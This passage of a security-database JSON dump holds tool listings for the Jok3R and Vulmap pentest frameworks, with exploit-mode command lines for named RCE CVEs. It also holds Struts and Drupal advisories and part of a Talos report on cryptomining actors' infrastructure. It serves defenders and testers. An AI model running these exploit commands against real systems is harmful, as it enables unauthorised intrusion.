Version | odat |\n | tnspoisoning | vulnscan | Test if TNS Listener is vulnerable to TNS Poisoning (CVE-2012-1675) | odat |\n | common-creds | bruteforce | Check common/default credentials on Oracle server | odat |\n | bruteforce-creds | bruteforce | Bruteforce Oracle accounts (might block some accounts !) | odat |\n | audit-oracle-postauth | postexploit | Check for privesc vectors, config leading to command execution, weak accounts after authenticating on Oracle | odat |\n | search-columns-passwords | postexploit | Search for columns storing passwords in the database | odat |\n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**PostgreSQL (default 5432/tcp)** \n\n \n \n +---------------+------------+------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +---------------+------------+------------------------------------------------+-----------+\n | default-creds | bruteforce | Check default credentials on PostgreSQL server | patator |\n +---------------+------------+------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**RDP (default 3389/tcp)** \n\n \n \n +----------+----------+-----------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +----------+----------+-----------------------------------------------------------------------+------------+\n | ms12-020 | vulnscan | Check for MS12-020 RCE vulnerability (any Windows before 13 Mar 2012) | metasploit |\n +---------+----------+-----------------------------------------------------------------------+------------+\n\n[](<https://draft.blogger.com/null>) \n**SMB (default 445/tcp)** \n\n \n \n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n | nmap-recon | recon | Recon using Nmap SMB scripts | nmap |\n | anonymous-enum-smb | recon | Attempt to perform enum (users, shares...) without account | nullinux |\n | nmap-vulnscan | vulnscan | Check for vulns in SMB (MS17-010, MS10-061, MS10-054, MS08-067...) using Nmap | nmap |\n | detect-ms17-010 | vulnscan | Detect MS17-010 SMB RCE | metasploit |\n | samba-rce-cve2015-0240 | vulnscan | Detect RCE vuln (CVE-2015-0240) in Samba 3.5.x and 3.6.X | metasploit |\n | exploit-rce-ms08-067 | exploit | Exploit for RCE vuln MS08-067 on SMB | metasploit |\n | exploit-rce-ms17-010-eternalblue | exploit | Exploit for RCE vuln MS17-010 EternalBlue on SMB | metasploit |\n | exploit-sambacry-rce-cve2017-7494 | exploit | Exploit for SambaCry RCE on Samba <= 4.5.9 (CVE-2017-7494) | metasploit |\n | auth-enum-smb | postexploit | Authenticated enumeration (users, groups, shares) on SMB | nullinux |\n | auth-shares-perm | postexploit | Get R/W permissions on SMB shares | smbmap |\n | smb-exec | postexploit | Attempt to get a remote shell (psexec-like, requires Administrator creds) | impacket |\n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n\n[](<https://draft.blogger.com/null>) \n**SMTP (default 25/tcp)** \n\n \n \n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n | smtp-cve | vulnscan | Scan for vulnerabilities (CVE-2010-4344, CVE-2011-1720, CVE-2011-1764, open-relay) on SMTP | nmap |\n | smtp-user-enum | vulnscan | Attempt to perform user enumeration via SMTP commands EXPN, VRFY and RCPT TO | smtp-user-enum |\n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n\n[](<https://draft.blogger.com/null>) \n**SNMP (default 161/udp)** \n\n \n \n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n | common-community-strings | bruteforce | Check common community strings on SNMP server | metasploit |\n | snmpv3-bruteforce-creds | bruteforce | Bruteforce SNMPv3 credentials | snmpwn |\n | enumerate-info | postexploit | Enumerate information provided by SNMP (and check for write access) | snmp-check |\n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n\n[](<https://draft.blogger.com/null>) \n**SSH (default 22/tcp)** \n\n \n \n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n | vulns-algos-scan | vulnscan | Scan supported algorithms and security info on SSH server | ssh-audit |\n | user-enumeration-timing-attack | exploit | Try to perform OpenSSH (versions <= 7.2 and >= 5.*) user enumeration timing attack OpenSSH | osueta |\n | default-ssh-key | bruteforce | Try to authenticate on SSH server using known SSH keys | changeme |\n | default-creds | bruteforce | Check default credentials on SSH | patator |\n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**Telnet (default 21/tcp)** \n\n \n \n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n | nmap-recon | recon | Recon using Nmap Telnet scripts | nmap |\n | default-creds | bruteforce | Check default credentials on Telnet (dictionary from https://cirt.net/passwords) | patator |\n | bruteforce-root-account | bruteforce | Bruteforce \"root\" account on Telnet | patator |\n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**VNC (default 5900/tcp)** \n\n \n \n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap VNC scripts | nmap |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | bruteforce-pass | bruteforce | Bruteforce VNC password | patator |\n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n \n \n\n\n**[Download Jok3R](<https://github.com/koutto/jok3r>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-01-23T12:25:00", "type": "kitploit", "title": "Jok3R - Network And Web Pentest Framework", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4344", "CVE-2011-1720", "CVE-2011-1764", "CVE-2012-1675", "CVE-2012-2122", "CVE-2014-6271", "CVE-2015-0240", "CVE-2015-4852", "CVE-2016-8735", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-3248", "CVE-2017-5638", "CVE-2017-7494", "CVE-2017-9798", "CVE-2017-9805", "CVE-2018-11776", "CVE-2018-2893"], "modified": "2019-01-23T12:25:12", "id": "KITPLOIT:5052987141331551837", "href": "http://www.kitploit.com/2019/01/jok3r-network-and-web-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-22T06:42:40", "description": "[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux &amp; MacOS &amp; Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker\n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n**[Download Vulmap](<https://github.com/zhzyker/vulmap> \"Download Vulmap\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-25T11:30:00", "type": "kitploit", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0738", "CVE-2010-1428", "CVE-2010-1870", "CVE-2011-3923", "CVE-2013-1966", "CVE-2013-2134", "CVE-2013-2251", "CVE-2014-4210", "CVE-2015-7501", "CVE-2016-3081", "CVE-2016-4437", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-12615", "CVE-2017-12629", "CVE-2017-3506", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-20062", "CVE-2018-2894", "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-0193", "CVE-2019-0230", "CVE-2019-17558", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-6340", "CVE-2019-7238", "CVE-2019-9082", "CVE-2020-10199", "CVE-2020-14882", "CVE-2020-1938", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2729", "CVE-2020-2883"], "modified": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2023-08-28T12:21:43", "description": "Apache Struts contains a Remote Code Execution when using results with no namespace and it's upper actions have no or wildcard namespace. The same flaw exists when using a url tag with no value, action set, and it's upper actions have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-18T19:24:38", "type": "osv", "title": "Apache Struts vulnerable to remote command execution (RCE) due to improper input validation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-08-28T11:04:18", "id": "OSV:GHSA-CR6J-3JP9-RW65", "href": "https://osv.dev/vulnerability/GHSA-cr6j-3jp9-rw65", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T08:19:34", "description": "\nJasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\n\n\nFor further information please refer to the official upstream advisory\nat <https://www.drupal.org/sa-core-2018-002.>\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n7.14-2+deb7u18.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-28T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-07-21T05:52:04", "id": "OSV:DLA-1325-1", "href": "https://osv.dev/vulnerability/DLA-1325-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2018-12-18T17:32:28", "description": "_Post authored by [David Liebenberg](<https://www.google.com/url?q=https://twitter.com/chinahanddave&sa=D&ust=1545149724666000>) and [Andrew Williams](<https://www.google.com/url?q=https://twitter.com/smugyeti&sa=D&ust=1545149724667000>)._ \n\n\n### Executive Summary\n\nThrough Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors that have netted them hundreds of thousands of U.S. dollars combined. \n \nThis blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies. \n \nWe will cover the recent activities of these actors: \n\n\n * Rocke \u2014A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.\n * 8220 Mining Group \u2014Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. The group targets Drupal, Hadoop YARN and Apache Struts2.\n * Tor2Mine \u2014A group that uses tor2web to deliver proxy communications to a hidden service for command and control (C2).\nThese groups have used similar TTPs, including: \n\n\n * Malicious shell scripts masquerading as JPEG files with the name \"logo*.jpg\" that install cron jobs and download and execute miners.\n * The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.\n * Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.\n * Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.\n * Tools such as XHide Process Faker, which can hide or change the name of Linux processes and PyInstaller, which can convert Python scripts into executables.\nWe were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. \n \nThe recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the [illicit cryptocurrency threat](<https://www.google.com/url?q=https://www.cyberthreatalliance.org/wp-content/uploads/2018/09/CTA-Illicit-CryptoMining-Whitepaper.pdf&sa=D&ust=1545149724689000>). However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. Talos published [separate research today covering this trend.](<https://blog.talosintelligence.com/2018/12/cryptocurrency-future-2018.html>) \n\n\n### Timeline of actors' campaigns\n\n#### [](<https://3.bp.blogspot.com/-jK9gU5Z4g6M/XBkSwhst2WI/AAAAAAAABh0/WgEn6WVJ0Aogu10HmoVBx-2CnIvTrCvTACLcBGAs/s1600/image5.jpg>) \n--- \nTimeline of Activity \n \n#### Introduction\n\nIllicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in delivering remote access trojans (RATs) and other malware. \n \nThrough our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing analysis of these attack's wallets and command and control (C2) servers we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining. \n \nWe also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. \n \nWe first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs. \n \nWe began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. We also noticed a similar toolset being used by an actor we named \"tor2mine,\" based on the fact that they additionally used tor2web services for C2 communications. \n \nWe also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits. \n \n\n\n#### \n\n#### Rocke/Iron cybercrime group\n\nCisco Talos wrote about [Rocke](<https://www.google.com/url?q=https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html&sa=D&ust=1545149724706000>) earlier this year, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure. \n \nIn the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted [Jenkins ](<https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/new-jenkins-campaign-hides-malware--kills-competing-crypto-miner&sa=D&ust=1545149724712000>)and [JBoss](<https://www.google.com/url?q=https://www.alibabacloud.com/blog/jbossminer-mining-malware-analysis_593804&sa=D&ust=1545149724712000>) servers, continuing to rely on malicious Git repositories, as well as malicious [Amazon Machine Images](<https://www.google.com/url?q=https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/&sa=D&ust=1545149724714000>). They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware [capabilities](<https://www.google.com/url?q=https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/&sa=D&ust=1545149724714000>). Several campaigns used the XHide Process Faker tool. \n \nWe have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn. \n \nThe dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files. \n \nWhile keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called [whatMiner](<https://www.google.com/url?q=https://github.com/MRdoulestar/whatMiner&sa=D&ust=1545149724720000>), developed by a Chinese-speaking actor. WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme for the project describes it as \"collecting and integrating all different kinds of illicit mining malware.\" \n\n\n[](<https://1.bp.blogspot.com/-G3Rbkg_o3Mc/XBkTFOJxe5I/AAAAAAAABh8/BWe5f_IQcIkJPH7e45o9Rzvyyb1Zzq1bQCLcBGAs/s1600/image2.png>)\n\n#### \n\n#### Git repository for whatMiner\n\nLooking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors on to the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one. \n \nWhile looking through this repository, we found a folder called \"sustes.\" There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet. \n \nMany of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. Both samples also made requests for a file called \"TermsHost.exe\" from an IP 39[.]108[.]177[.]252, as 